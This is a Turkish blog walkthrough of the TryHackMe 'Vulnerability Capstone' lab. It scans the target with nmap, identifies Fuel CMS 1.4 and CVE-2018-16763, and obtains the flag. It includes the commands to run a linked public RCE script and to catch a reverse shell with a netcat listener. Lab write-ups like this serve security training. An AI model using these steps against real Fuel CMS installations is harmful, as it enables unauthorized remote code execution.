Login
sign up

Vulnerability Capstone Türkçe Çözümü

laboratuvar erişimi için: https://tryhackme.com/room/vulnerabilitycapstone

Ackme Support Incorporated kısa süre önce yeni bir blog başlattı. Geliştirici ekibi, içerik oluşturmadan ve herkese açık olarak yayınlamadan önce bir güvenlik denetimi talep etti. Blog üzerinde bir güvenlik denetimi yapmak, keşfettiğiniz herhangi bir güvenlik açığını aramak ve kullanmak sizin sorumluluğunuzdadır.

[Soru 1.1]: Let’s get hacking

Cevap: Cevaba gerek yok.

[Soru 2.1]: Bu göreve bağlı savunmasız makineyi başlatın ve savunmasız makineyi ziyaret etmeden önce beş dakika bekleyin.

Cevap: Cevaba gerek yok.

[Soru 2.2]: Savunmasız makinede çalışan uygulamanın adı nedir?

bir nmap taraması başlatalım

nmap -p- –min-rate=1000 -sV -sC -T4 10.10.190.49 -oN vulnerabilityresarch.txt

22 ve 80 portunun çalıştığını görmekteyiz.

Siteye gidelim

[Soru 2.3]:Bu uygulamanın sürüm numarası nedir?

Cevap 2.3: 1.4

[Soru 2.4]:Bir saldırganın bu uygulama üzerinde uzaktan kod çalıştırmasına izin veren CVE’nin numarası nedir?

not: Format: CVE-XXXX-XXXXX bu tarzda olmalı.

exploit db’ye gidelim ve fuel cms aratalım bizim versiyon numarası ile ilişkili cve var mı göz atalım.

burada bir cve var

Cevap : CVE-2018-16763

şimdi bize Bu modül boyunca öğrendiğiniz kaynakları ve becerileri kullanarak bu güvenlik açığından faydalanmak için ilgili bir istismar bulup kullanın demişler. Hadi yapalım.

not:Bu güvenlik açığı için kullanılabilecek çok sayıda açık vardır (bazıları diğerlerinden daha kullanışlıdır!)

Bu zafiyetli makinede bulunan flag’in değeri nedir? Flag zafiyetli makinede /home/ubuntu içinde bulunur.

bunun için güzel bir script buldum. https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated bunu indirip çalıştıralım.

tabiki raw olarak kopyala yapıştır yaptığınızdan ve chmod +x yetkisi verdiğinizden emin olun. Daha sonra nc -nlvp <port> ile dinlemeye alınız.

python3 cms1-4-exploit.py http://10.10.190.49 10.9.2.237 40404

buradaki syntax’ımız exploit dosyasının adı, sitenin zafiyetli makinenin url’i sizin tryhackme ip adresiniz ve açmak istediğiniz port

bize flag’in bulunduğu dizin hakkında fikir verildiği için direkt oraya gidiyoruz.

ve flag’i elde ettik.

Etiketlendi

Stay informed with the latest cybersecurity insights and best practices. Subscribe now for exclusive tips and updates

subscribe

. (socials ).

. (location) .

We would love to here from you

youhave2findme

They’ve never learned the most important rule of cyberspace – Computers dont lie but liars can compute.